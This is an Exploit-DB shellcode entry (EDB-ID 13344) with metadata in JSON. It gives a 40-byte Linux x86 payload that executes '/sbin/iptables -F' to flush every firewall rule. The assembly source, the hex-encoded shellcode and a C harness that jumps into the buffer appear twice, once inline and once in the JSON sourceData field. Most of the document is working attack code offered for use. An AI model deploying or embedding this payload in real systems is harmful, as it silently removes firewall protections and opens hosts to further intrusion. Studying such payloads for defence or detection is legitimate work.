ID EDB-ID:13344
Type exploitdb
Reporter Kris Katterjohn
Modified 2007-03-09T00:00:00
Description
linux/x86 /sbin/iptables -F 40 bytes. Shellcode exploit for lin_x86 platform
/* By Kris Katterjohn 11/18/2006
*
* 40 byte shellcode to flush iptables for Linux x86
*
*
*
* section .text
*
* global _start
*
* _start:
*
* ; execve("/sbin/iptables", { "/sbin/iptables", "-F", NULL }, NULL)
*
* push byte 11
* pop eax
* cdq
* push edx
* push word 0x462d
* mov ecx, esp
* push edx
* push word 0x7365
* push 0x6c626174
* push 0x70692f6e
* push 0x6962732f
* mov ebx, esp
* push edx
* push ecx
* push ebx
* mov ecx, esp
* int 0x80
*/
main()
{
char shellcode[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x46\x89"
"\xe1\x52\x66\x68\x65\x73\x68\x74\x61\x62"
"\x6c\x68\x6e\x2f\x69\x70\x68\x2f\x73\x62"
"\x69\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
(*(void (*)()) shellcode)();
}
// milw0rm.com [2007-03-09]
{"bulletinFamily": "exploit", "id": "EDB-ID:13344", "cvelist": [], "modified": "2007-03-09T00:00:00", "lastseen": "2016-02-01T17:41:27", "edition": 1, "sourceData": "/* By Kris Katterjohn 11/18/2006\n *\n * 40 byte shellcode to flush iptables for Linux x86\n *\n *\n *\n * section .text\n *\n * global _start\n *\n * _start:\n *\n * ; execve(\"/sbin/iptables\", { \"/sbin/iptables\", \"-F\", NULL }, NULL)\n *\n * push byte 11\n * pop eax\n * cdq\n * push edx\n * push word 0x462d\n * mov ecx, esp\n * push edx\n * push word 0x7365\n * push 0x6c626174\n * push 0x70692f6e\n * push 0x6962732f\n * mov ebx, esp\n * push edx\n * push ecx\n * push ebx\n * mov ecx, esp\n * int 0x80\n */\n\nmain()\n{\n char shellcode[] =\n \"\\x6a\\x0b\\x58\\x99\\x52\\x66\\x68\\x2d\\x46\\x89\"\n \"\\xe1\\x52\\x66\\x68\\x65\\x73\\x68\\x74\\x61\\x62\"\n \"\\x6c\\x68\\x6e\\x2f\\x69\\x70\\x68\\x2f\\x73\\x62\"\n \"\\x69\\x89\\xe3\\x52\\x51\\x53\\x89\\xe1\\xcd\\x80\";\n\n (*(void (*)()) shellcode)();\n}\n\n// milw0rm.com [2007-03-09]", "published": "2007-03-09T00:00:00", "href": "https://www.exploit-db.com/exploits/13344/", "osvdbidlist": [], "reporter": "Kris Katterjohn", "hash": "3c9266247eb6d1610d7359de43f901735691266703b9601a5e223125acb5965c", "title": "linux/x86 - /sbin/iptables -F 40 bytes", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "linux/x86 /sbin/iptables -F 40 bytes. Shellcode exploit for lin_x86 platform", "references": [], "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/13344/", "enchantments": {"vulnersScore": 5.7}}
{"result": {}}